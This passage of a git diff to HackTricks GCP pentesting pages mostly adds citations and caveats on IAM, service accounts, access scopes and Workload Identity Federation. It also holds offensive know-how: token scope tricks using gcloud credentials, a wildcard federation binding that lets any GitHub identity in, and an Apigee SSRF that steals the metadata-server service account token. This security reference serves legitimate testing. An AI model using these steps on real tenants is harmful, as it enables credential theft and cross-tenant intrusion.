+A **PAB policy** is an IAM control that **limits the resources that a set of principals are eligible to access**. It **doesn't grant access by itself**; it acts as an additional boundary that can only further restrict what principals can do, even if IAM role bindings would otherwise allow it. <sup>[[10]](#references)</sup>
 
-PAB policies are created at the **organization** level and then **enforced by creating policy bindings** (policy bindings bind a policy to a *principal set*).
+PAB policies are created at the **organization** level and then **enforced by creating policy bindings** (policy bindings bind a policy to a *principal set*). <sup>[[10]](#references)[[11]](#references)</sup>
 
 Useful docs:
 
@@ -133,7 +137,7 @@ Useful docs:
 
 ### Create / Assign (Apply) a PAB
 
-Create the PAB policy in the organization:
+Create the PAB policy in the organization: <sup>[[11]](#references)</sup>
 
 ```bash
 gcloud iam principal-access-boundary-policies create PAB_POLICY_ID \
@@ -158,7 +162,7 @@ Example `pab-rules.json`:
 ]
 ```
 
-Apply it by creating a policy binding (this is what actually enforces the policy for the principal set):
+Apply it by creating a policy binding (this is what actually enforces the policy for the principal set): <sup>[[11]](#references)</sup>
 
 ```bash
 gcloud iam policy-bindings create BINDING_ID \
@@ -170,13 +174,14 @@ gcloud iam policy-bindings create BINDING_ID \
 
 Notes:
 
-- The binding parent can also be a folder or organization (use `--folder=FOLDER_ID` or `--organization=ORG_ID` instead of `--project=PROJECT_ID`).
-- `--target-principal-set` supports multiple formats (projects/folders/orgs, workforce/workload identity pools, workspace identity, etc.).
-- Enforcement versions accepted values are `1`, `2`, `3`, and `latest`.
+- The binding parent can also be a folder or organization (use `--folder=FOLDER_ID` or `--organization=ORG_ID` instead of `--project=PROJECT_ID`). <sup>[[11]](#references)</sup>
+- `--target-principal-set` supports multiple formats (projects/folders/orgs, workforce/workload identity pools, workspace identity, etc.). <sup>[[10]](#references)[[11]](#references)</sup>
+- Enforcement versions accepted values are `1`, `2`, `3`, and `latest`. <sup>[[11]](#references)</sup>
+- Current PAB documentation also lists enforcement version `4` as accepted. <sup>[[11]](#references)</sup>
 
 ### Enumerate
 
-List PAB policies in an org:
+List PAB policies in an org: <sup>[[12]](#references)</sup>
 
 ```bash
 gcloud iam principal-access-boundary-policies list \
@@ -184,7 +189,7 @@ gcloud iam principal-access-boundary-policies list \
   --location=global
 ```
 
-Describe a specific PAB policy:
+Describe a specific PAB policy: <sup>[[12]](#references)</sup>
 
 ```bash
 gcloud iam principal-access-boundary-policies describe PAB_POLICY_ID \
@@ -192,7 +197,7 @@ gcloud iam principal-access-boundary-policies describe PAB_POLICY_ID \
   --location=global
 ```
 
-List policy bindings under a project/folder/org (these bindings are what enforce PABs):
+List policy bindings under a project/folder/org (these bindings are what enforce PABs): <sup>[[12]](#references)</sup>
 
 ```bash
 gcloud iam policy-bindings list \
@@ -200,7 +205,7 @@ gcloud iam policy-bindings list \
   --location=global
 ```
 
-Search policy bindings by target principal set (what PABs apply to this target?):
+Search policy bindings by target principal set (what PABs apply to this target?): <sup>[[12]](#references)</sup>
 
 ```bash
 gcloud iam policy-bindings search-target-policy-bindings \
@@ -209,7 +214,7 @@ gcloud iam policy-bindings search-target-policy-bindings \
   --target='//cloudresourcemanager.googleapis.com/projects/TARGET_PROJECT_ID'
 ```
 
-List policy bindings that reference a specific PAB policy:
+List policy bindings that reference a specific PAB policy: <sup>[[12]](#references)</sup>
 
 ```bash
 gcloud iam principal-access-boundary-policies search-policy-bindings PAB_POLICY_ID \
@@ -219,7 +224,7 @@ gcloud iam principal-access-boundary-policies search-policy-bindings PAB_POLICY_
 
 ### Remove
 
-Remove a PAB from a principal set (delete the policy binding):
+Remove a PAB from a principal set (delete the policy binding): <sup>[[13]](#references)</sup>
 
 ```bash
 gcloud iam policy-bindings delete BINDING_ID \
@@ -227,7 +232,7 @@ gcloud iam policy-bindings delete BINDING_ID \
   --location=global
 ```
 
-Delete the PAB policy itself (optionally `--force` if there are still bindings referencing it):
+Delete the PAB policy itself (optionally `--force` if there are still bindings referencing it): <sup>[[13]](#references)</sup>
 
 ```bash
 gcloud iam principal-access-boundary-policies delete PAB_POLICY_ID \
@@ -237,25 +242,31 @@ gcloud iam principal-access-boundary-policies delete PAB_POLICY_ID \
 
 ## Users <a href="#default-credentials" id="default-credentials"></a>
 
-In **GCP console** there **isn't any Users or Groups** management, that is done in **Google Workspace**. Although you could synchronize a different identity provider in Google Workspace.
+In **GCP console** there **isn't any Users or Groups** management, that is done in **Google Workspace**. Although you could synchronize a different identity provider in Google Workspace. <sup>[[14]](#references)</sup>
 
 You can access Workspaces **users and groups in** [**https://admin.google.com**](https://admin.google.com/).
 
-**MFA** can be **forced** to Workspaces users, however, an **attacker** could use a token to access GCP **via cli which won't be protected by MFA** (it will be protected by MFA only when the user logins to generate it: `gcloud auth login`).
+**MFA** can be **forced** to Workspaces users, however, an **attacker** could use a token to access GCP **via cli which won't be protected by MFA** (it will be protected by MFA only when the user logins to generate it: `gcloud auth login`). <sup>[[14]](#references)[[15]](#references)</sup>
+
+Current Google Cloud guidance likewise warns that an attacker who obtains an OAuth token can use it from the CLI without a new MFA challenge while the token remains valid. <sup>[[15]](#references)</sup>
 
 ## Groups
 
-When an organisation is created several groups are **strongly suggested to be created.** If you manage any of them you might have compromised all or an important part of the organization:
+When an organisation is created several groups are **strongly suggested to be created.** If you manage any of them you might have compromised all or an important part of the organization: <sup>[[14]](#references)</sup>
 
 <table data-header-hidden><thead><tr><th width="299.3076923076923"></th><th></th></tr></thead><tbody><tr><td><strong>Group</strong></td><td><strong>Function</strong></td></tr><tr><td><strong><code>gcp-organization-admins</code></strong><br><em>(group or individual accounts required for checklist)</em></td><td>Administering any resource that belongs to the organization. Assign this role sparingly; org admins have access to all of your Google Cloud resources. Alternatively, because this function is highly privileged, consider using individual accounts instead of creating a group.</td></tr><tr><td><strong><code>gcp-network-admins</code></strong><br><em>(required for checklist)</em></td><td>Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.</td></tr><tr><td><strong><code>gcp-billing-admins</code></strong><br><em>(required for checklist)</em></td><td>Setting up billing accounts and monitoring their usage.</td></tr><tr><td><strong><code>gcp-developers</code></strong><br><em>(required for checklist)</em></td><td>Designing, coding, and testing applications.</td></tr><tr><td><strong><code>gcp-security-admins</code></strong><br></td><td>Establishing and managing security policies for the entire organization, including access management and <a href="https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints">organization constraint policies</a>. See the <a href="https://cloud.google.com/architecture/security-foundations/authentication-authorization#users_and_groups">Google Cloud security foundations guide</a> for more information about planning your Google Cloud security infrastructure.</td></tr><tr><td><strong><code>gcp-devops</code></strong></td><td>Creating or managing end-to-end pipelines that support continuous integration and delivery, monitoring, and system provisioning.</td></tr><tr><td><strong><code>gcp-logging-admins</code></strong></td><td></td></tr><tr><td><strong><code>gcp-logging-viewers</code></strong></td><td></td></tr><tr><td><strong><code>gcp-monitor-admins</code></strong></td><td></td></tr><tr><td><strong><code>gcp-billing-viewer</code></strong><br><em>(no longer by default)</em></td><td>Monitoring the spend on projects. Typical members are part of the finance team.</td></tr><tr><td><strong><code>gcp-platform-viewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing resource information across the Google Cloud organization.</td></tr><tr><td><strong><code>gcp-security-reviewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing cloud security.</td></tr><tr><td><strong><code>gcp-network-viewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing network configurations.</td></tr><tr><td><strong><code>grp-gcp-audit-viewer</code></strong><br><em>(no longer by default)</em></td><td>Viewing audit logs.</td></tr><tr><td><strong><code>gcp-scc-admin</code></strong><br><em>(no longer by default)</em></td><td>Administering Security Command Center.</td></tr><tr><td><strong><code>gcp-secrets-admin</code></strong><br><em>(no longer by default)</em></td><td>Managing secrets in Secret Manager.</td></tr></tbody></table>
+The exact group names, roles, and membership vary by organization; use this list as a starting point and verify the current IAM configuration before treating a group as privileged. <sup>[[14]](#references)</sup>
 
 ## **Default Password Policy**
+
+Google Workspace lets administrators require strong passwords, set a minimum and maximum length between 8 and 100 characters, prevent reuse, and configure expiration; expiration is disabled by default. <sup>[[16]](#references)</sup>
 
 - Enforce strong passwords
 - Between 8 and 100 characters
 - No reuse
 - No expiration
-- If people is accessing Workspace through a third party provider, these requirements aren't applied.
+- If people is accessing Workspace through a third party provider, these requirements aren't applied. <sup>[[16]](#references)</sup>
+- Current Workspace documentation distinguishes OIDC and password-sync/directory-sync flows, where these password policies may not apply, from SAML-based SSO, which currently still enforces them. <sup>[[16]](#references)</sup>
 
 <figure><img src="../../../images/image (20).png" alt=""><figcaption></figcaption></figure>
 
@@ -264,18 +275,20 @@ When an organisation is created several groups are **strongly suggested to be cr
 ## **Service accounts**
 
 These are the principals that **resources** can **have** **attached** and access to interact easily with GCP. For example, it's possible to access the **auth token** of a Service Account **attached to a VM** in the metadata.\
-It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
+It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance. <sup>[[1]](#references)[[17]](#references)[[19]](#references)</sup>
 
-It's similar to **IAM roles from AWS**. But not like in AWS, **any** service account can be **attached to any service** (it doesn't need to allow it via a policy).
+It's similar to **IAM roles from AWS**. But not like in AWS, **any** service account can be **attached to any service** (it doesn't need to allow it via a policy). <sup>[[17]](#references)</sup>
 
-Several of the service accounts that you will find are actually **automatically generated by GCP** when you start using a service, like:
+Current Google Cloud documentation qualifies this: user-managed service accounts can be attached to supported services, and the caller still needs the relevant IAM permissions to attach or use them. <sup>[[17]](#references)</sup>
+
+Several of the service accounts that you will find are actually **automatically generated by GCP** when you start using a service, like: <sup>[[17]](#references)[[19]](#references)</sup>
 
 ```
 PROJECT_NUMBER-compute@developer.gserviceaccount.com
 PROJECT_ID@appspot.gserviceaccount.com
 ```
 
-However, it's also possible to create and attach to resources **custom service accounts**, which will look like this:
+However, it's also possible to create and attach to resources **custom service accounts**, which will look like this: <sup>[[17]](#references)</sup>
 
 ```
 SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
@@ -283,20 +296,23 @@ SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
 
 ### **Keys & Tokens**
 
-There are 2 main ways to access GCP as a service account:
+There are 2 main ways to access GCP as a service account: <sup>[[18]](#references)</sup>
 
 - **Via OAuth tokens**: These are tokens that you will get from places like metadata endpoints or stealing http requests and they are limited by the **access scopes**.
-- **Keys**: These are public and private key pairs that will allow you to sign requests as the service account and even generate OAuth tokens to perform actions as the service account. These keys are dangerous because they are more complicated to limit and control, that's why GCP recommend to not generate them.
-  - Note that every-time a SA is created, **GCP generates a key for the service account** that the user cannot access (and won't be listed in the web application). According to [**this thread**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) this key is **used internally by GCP** to give metadata endpoints access to generate the accesible OAuth tokens.
+- **Keys**: These are public and private key pairs that will allow you to sign requests as the service account and even generate OAuth tokens to perform actions as the service account. These keys are dangerous because they are more complicated to limit and control, that's why GCP recommend to not generate them. <sup>[[18]](#references)</sup>
+  - Note that every-time a SA is created, **GCP generates a key for the service account** that the user cannot access (and won't be listed in the web application). According to [**this thread**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) this key is **used internally by GCP** to give metadata endpoints access to generate the accesible OAuth tokens. <sup>[[18]](#references)[[25]](#references)</sup>
+  - Current Google Cloud documentation distinguishes those Google-owned and managed key pairs from user-managed key pairs: the former are not accessible to users or listed as user-managed keys, while managed services can use Google-managed credentials for short-lived tokens. <sup>[[18]](#references)</sup>
 
 ### **Access scopes**
 
 Access scope are **attached to generated OAuth tokens** to access the GCP API endpoints. They **restrict the permissions** of the OAuth token.\
-This means that if a token belongs to an Owner of a resource but doesn't have the in the token scope to access that resource, the token **cannot be used to (ab)use those privileges**.
+This means that if a token belongs to an Owner of a resource but doesn't have the in the token scope to access that resource, the token **cannot be used to (ab)use those privileges**. <sup>[[1]](#references)[[19]](#references)</sup>
 
-Google actually [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service_account_permissions) that **access scopes are not used and to rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programmatically.
+Current Compute Engine guidance describes access scopes as an additional limit on the OAuth token; IAM permissions and other policy checks still apply. <sup>[[19]](#references)</sup>
 
-You can see what **scopes** are **assigned** by **querying:**
+Google actually [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service_account_permissions) that **access scopes are not used and to rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programmatically. <sup>[[1]](#references)[[19]](#references)</sup>
+
+You can see what **scopes** are **assigned** by **querying:** <sup>[[20]](#references)</sup>
 
 ```bash
 curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=<access_token>'
@@ -313,13 +329,17 @@ curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=<access_token>
 }
 ```
 
-The previous **scopes** are the ones generated by **default** using **`gcloud`** to access data. This is because when you use **`gcloud`** you first create an OAuth token, and then use it to contact the endpoints.
+The previous **scopes** are the ones generated by **default** using **`gcloud`** to access data. This is because when you use **`gcloud`** you first create an OAuth token, and then use it to contact the endpoints. <sup>[[1]](#references)[[21]](#references)</sup>
 
-The most important scope of those potentially is **`cloud-platform`**, which basically means that it's possible to **access any service in GCP**.
+Current `gcloud auth application-default login` documentation lists default scopes of `openid`, `userinfo.email`, `cloud-platform`, and `sqlservice.login`; requested flags and credential flows can change the resulting scopes. <sup>[[21]](#references)</sup>
 
-You can **find a list of** [**all the possible scopes in here**](https://developers.google.com/identity/protocols/googlescopes)**.**
+The most important scope of those potentially is **`cloud-platform`**, which basically means that it's possible to **access any service in GCP**. <sup>[[1]](#references)[[22]](#references)</sup>
 
-If you have **`gcloud`** browser credentials, it's possible to **obtain a token with other scopes,** doing something like:
+The `cloud-platform` scope permits requests to Google Cloud APIs but does not by itself grant access or bypass IAM roles and other policy checks. <sup>[[19]](#references)[[22]](#references)</sup>
+
+You can **find a list of** [**all the possible scopes in here**](https://developers.google.com/identity/protocols/googlescopes)**.** <sup>[[22]](#references)</sup>
+
+If you have **`gcloud`** browser credentials, it's possible to **obtain a token with other scopes,** doing something like: <sup>[[21]](#references)[[22]](#references)</sup>
 
 ```bash
 # Maybe you can get a user token with other scopes changing the scopes array from ~/.config/gcloud/credentials.db
@@ -335,15 +355,40 @@ gcloud auth application-default print-access-token
 
 ## **Terraform IAM Policies, Bindings and Memberships**
 
-As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) using terraform with GCP there are different ways to grant a principal access over a resource:
+As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) using terraform with GCP there are different ways to grant a principal access over a resource: <sup>[[23]](#references)[[24]](#references)</sup>
 
 - **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles.
 - **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**.
 - **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).
 
+Current Terraform provider semantics map these categories to resource types: `google_project_iam_member` is non-authoritative for one role, `google_project_iam_binding` is authoritative for one role, and `google_project_iam_policy` is authoritative for the whole project; inherited access remains a separate concern. <sup>[[23]](#references)[[24]](#references)</sup>
+
 ## References
 
-- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
-- [https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy)
+- [1] [Google Cloud privilege escalation & post-exploitation tactics](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [2] [About resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy)
+- [3] [Migrate projects between organization resources](https://cloud.google.com/resource-manager/docs/project-migration)
+- [4] [Migrating a project from one organization to another (GCP)](https://medium.com/google-cloud/migrating-a-project-from-one-organization-to-another-gcp-4b37a86dd9e6)
+- [5] [Organization Policy overview](https://cloud.google.com/resource-manager/docs/organization-policy/overview)
+- [6] [Manage Google Cloud security baseline constraints](https://cloud.google.com/resource-manager/docs/manage-baseline-constraints)
+- [7] [Organization policy constraints](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)
+- [8] [Roles and permissions](https://cloud.google.com/iam/docs/roles-overview)
+- [9] [Manage access to other resources](https://cloud.google.com/iam/docs/manage-access-other-resources)
+- [10] [Principal access boundary policies](https://cloud.google.com/iam/docs/principal-access-boundary-policies)
+- [11] [Create and apply principal access boundary policies](https://cloud.google.com/iam/docs/principal-access-boundary-policies-create)
+- [12] [View principal access boundary policies](https://cloud.google.com/iam/docs/principal-access-boundary-policies-view)
+- [13] [Remove principal access boundary policies](https://cloud.google.com/iam/docs/principal-access-boundary-policies-remove)
+- [14] [Authentication and authorization](https://cloud.google.com/architecture/security-foundations/authentication-authorization)
+- [15] [Best practices for mitigating compromised OAuth tokens for Google Cloud CLI](https://cloud.google.com/architecture/bps-for-mitigating-gcloud-oauth-tokens)
+- [16] [Enforce and monitor password requirements for users](https://knowledge.workspace.google.com/admin/users/enforce-and-monitor-password-requirements-for-users)
+- [17] [Types of service accounts](https://cloud.google.com/iam/docs/service-account-types)
+- [18] [Service account credentials](https://cloud.google.com/iam/docs/service-account-creds)
+- [19] [Service accounts](https://cloud.google.com/compute/docs/access/service-accounts)
+- [20] [Token types](https://cloud.google.com/docs/authentication/token-types)
+- [21] [gcloud auth application-default login](https://cloud.google.com/sdk/gcloud/reference/auth/application-default/login)
+- [22] [OAuth 2.0 Scopes for Google APIs](https://developers.google.com/identity/protocols/googlescopes)
+- [23] [Best practices when working with Google Cloud resources](https://cloud.google.com/docs/terraform/best-practices/working-with-resources)
+- [24] [google_project_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam)
+- [25] [Service account keys - observations](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
+++ b/src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
@@ -6,9 +6,9 @@
 
 ### GCP
 
-In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed:
+In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed.<sup>[[1]](#references)[[4]](#references)</sup>
 
-- **Create the Service Account** to access from github actions with the **desired permissions:**
+- **Create the Service Account** to access from github actions with the **desired permissions:**<sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 projectId=FIXME
@@ -28,7 +28,10 @@ gcloud projects add-iam-policy-binding $projectId \
     --role="roles/iam.securityReviewer"
 ```
 
-- Generate a **new workload identity pool**:
+> [!NOTE]
+> Before configuring Workload Identity Federation, verify that the IAM, Resource Manager, Service Account Credentials, and Security Token Service APIs required by Google's deployment-pipeline guidance are enabled; this example explicitly enables only `iamcredentials.googleapis.com`.<sup>[[1]](#references)</sup>
+
+- Generate a **new workload identity pool**:<sup>[[1]](#references)[[6]](#references)</sup>
 
 ```bash
 # Create a Workload Identity Pool
@@ -43,7 +46,7 @@ poolId=$(gcloud iam workload-identity-pools describe $poolName \
   --format='get(name)')
 ```
 
-- Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario):
+- Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario):<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization)
@@ -61,7 +64,10 @@ providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
   --format='get(name)')
 ```
 
-- Finally, **allow the principal** from the provider to use a service principal:
+> [!NOTE]
+> The provider above maps GitHub claims but does not set a provider-level `--attribute-condition`. The subsequent service-account binding is repository-scoped, but Google recommends restricting admission at the provider with an organization condition and, when needed, a branch condition such as `assertion.repository_owner=='ORG' && assertion.ref=='refs/heads/main'`.<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
+
+- Finally, **allow the principal** from the provider to use a service principal:<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
 
 ```bash
 gitHubRepoName="repo-org/repo-name"
@@ -71,9 +77,9 @@ gcloud iam service-accounts add-iam-policy-binding $saId \
 ```
 
 > [!WARNING]
-> Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used).
+> Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used).<sup>[[1]](#references)[[2]](#references)</sup>
 >
-> However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard:
+> However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard:<sup>[[2]](#references)[[3]](#references)</sup>
 
 <pre class="language-bash"><code class="lang-bash"># Create a Workload Identity Pool
 poolName=wi-pool2
@@ -110,15 +116,17 @@ providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
 <strong>  --member="principalSet://iam.googleapis.com/${poolId}/*"
 </strong></code></pre>
 
+The wildcard principal set represents every identity in the workload identity pool, so any GitHub identity admitted by this provider can attempt to impersonate the service account.<sup>[[2]](#references)[[3]](#references)</sup>
+
 > [!WARNING]
 > In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\
 > It should be always something like this:
 >
-> `attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
+> `attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### Github
 
-Remember to change **`${providerId}`** and **`${saId}`** for their respective values:
+Remember to change **`${providerId}`** and **`${saId}`** for their respective values.<sup>[[3]](#references)[[4]](#references)[[6]](#references)</sup>
 
 ```yaml
 name: Check GCP action
@@ -154,7 +162,33 @@ jobs:
           gcloud secrets list
 ```
 
+### Current workflow adjustments
+
+> [!WARNING]
+> The original workflow above is preserved verbatim, including `activate_credentials_file: true`. For a current workflow, add `actions/checkout@v4` before `auth`; when `create_credentials_file` is enabled, the pinned v2.1.3 action documents checkout as a prerequisite. The action metadata does not declare `activate_credentials_file`, so use the supported `create_credentials_file: true` input instead.<sup>[[6]](#references)[[7]](#references)</sup>
+
+```yaml
+steps:
+  - uses: "actions/checkout@v4"
+  - id: "auth"
+    name: "Authenticate to GCP"
+    uses: "google-github-actions/auth@v2.1.3"
+    with:
+      create_credentials_file: true
+      workload_identity_provider: "${providerId}"
+      service_account: "${saId}"
+```
+
+## References
+
+- [1] [Configure Workload Identity Federation with deployment pipelines](https://cloud.google.com/iam/docs/workload-identity-federation-with-deployment-pipelines)
+- [2] [Workload Identity Federation](https://cloud.google.com/iam/docs/workload-identity-federation)
+- [3] [Principal identifiers](https://cloud.google.com/iam/docs/principal-identifiers)
+- [4] [Configuring OpenID Connect in Google Cloud Platform](https://docs.github.com/en/actions/how-tos/secure-your-work/security-harden-deployments/oidc-in-google-cloud-platform)
+- [5] [OpenID Connect reference](https://docs.github.com/en/actions/reference/security/oidc)
+- [6] [google-github-actions/auth README at v2.1.3](https://github.com/google-github-actions/auth/tree/v2.1.3)
+- [7] [google-github-actions/auth action metadata at v2.1.3](https://github.com/google-github-actions/auth/blob/v2.1.3/action.yml)
+- [8] [Create service accounts](https://cloud.google.com/iam/docs/service-accounts-create)
+- [9] [IAM roles and permissions](https://cloud.google.com/iam/docs/roles-permissions/iam)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
@@ -17,7 +17,7 @@ roles/resourcemanager.folderViewer
 roles/resourcemanager.organizationViewer
 ```
 
-APIs to enable (from starbase):
+APIs to enable (from starbase):<sup>[[7]](#references)</sup>
 
 ```
 gcloud services enable \
@@ -51,6 +51,8 @@ gcloud services enable \
 
 ### [PurplePanda](https://github.com/carlospolop/PurplePanda/tree/master/intel/google)
 
+PurplePanda's organization-level role recommendations are documented in the linked source.<sup>[[1]](#references)</sup>
+
 ```
 From https://github.com/carlospolop/PurplePanda/tree/master/intel/google#permissions-configuration
 
@@ -66,6 +68,8 @@ roles/secretmanager.viewer
 
 ### [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform#permissions)
 
+ScoutSuite's GCP permission recommendations are documented in the linked source.<sup>[[2]](#references)</sup>
+
 ```
 From https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform#permissions
 
@@ -75,6 +79,8 @@ roles/stackdriver.accounts.viewer
 ```
 
 ### [CloudSploit](https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md#cloud-provider-configuration)
+
+CloudSploit's custom security-audit role uses the following permissions.<sup>[[3]](#references)</sup>
 
 ```
 From https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md#cloud-provider-configuration
@@ -127,6 +133,8 @@ includedPermissions:
 
 ### [Cartography](https://lyft.github.io/cartography/modules/gcp/config.html)
 
+Cartography's documented organization-level roles are listed below.<sup>[[4]](#references)[[5]](#references)</sup>
+
 ```
 From https://lyft.github.io/cartography/modules/gcp/config.html
 
@@ -137,6 +145,8 @@ roles/resourcemanager.folderViewer
 
 ### [Starbase](https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md)
 
+Starbase's documented GCP roles are listed below.<sup>[[6]](#references)[[7]](#references)</sup>
+
 ```
 From https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
 
@@ -145,5 +155,14 @@ roles/iam.organizationRoleViewer
 roles/bigquery.metadataViewer
 ```
 
+## References
+
+- [1] [PurplePanda Google discovery module](https://github.com/carlospolop/PurplePanda/tree/master/intel/google)
+- [2] [ScoutSuite Google Cloud Platform permissions](https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform)
+- [3] [CloudSploit GCP configuration](https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md)
+- [4] [Cartography GCP configuration](https://lyft.github.io/cartography/modules/gcp/config.html)
+- [5] [Cartography GCP configuration (current documentation)](https://docs.cartography.dev/modules/gcp/config.html)
+- [6] [Graph Google Cloud development documentation](https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md)
+- [7] [JupiterOne Google Cloud integration authorization](https://docs.jupiterone.io/integrations/directory/google-cloud)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-apigee-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-apigee-post-exploitation.md
@@ -4,12 +4,12 @@
 
 ## Apigee metadata SSRF -> Dataflow cross-tenant pivot
 
-A single Apigee tenant project can be abused to reach the Message Processor metadata server, steal its service account, and pivot into a shared Dataflow analytics pipeline that reads/writes cross-tenant buckets.
+A single Apigee tenant project can be abused to reach the Message Processor metadata server, steal its service account, and pivot into a shared Dataflow analytics pipeline that reads/writes cross-tenant buckets.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ### Expose the metadata server through Apigee
 
-- Set an Apigee proxy target to `http://169.254.169.254` and request tokens from `/computeMetadata/v1/instance/service-accounts/default/token` with `Metadata-Flavor: Google`.
-- GCP metadata rejects requests containing `X-Forwarded-For`; Apigee adds it by default. Strip it with `AssignMessage` before proxying:
+- Set an Apigee proxy target to `http://169.254.169.254` and request tokens from `/computeMetadata/v1/instance/service-accounts/default/token` with `Metadata-Flavor: Google`.<sup>[[1]](#references)[[4]](#references)</sup>
+- GCP metadata rejects requests containing `X-Forwarded-For`; Apigee adds it by default. Use `AssignMessage` to strip it before proxying.<sup>[[1]](#references)[[2]](#references)[[4]](#references)</sup>
 
 ```xml
 <AssignMessage name="strip-xff">
@@ -24,8 +24,8 @@ A single Apigee tenant project can be abused to reach the Message Processor meta
 
 ### Enumerate the stolen Apigee service account
 
-- The leaked SA (Google-managed under `gcp-sa-apigee`) can be enumerated with tools like [gcpwn](https://github.com/NetSPI/gcpwn) to quickly test permissions.
-- Observed powerful permissions included **Compute disk/snapshot admin**, **GCS read/write across tenant buckets**, and **Pub/Sub topic publish**. Basic discovery:
+- The leaked SA (Google-managed under `gcp-sa-apigee`) can be enumerated with tools like [gcpwn](https://github.com/NetSPI/gcpwn) to quickly test permissions.<sup>[[1]](#references)</sup>
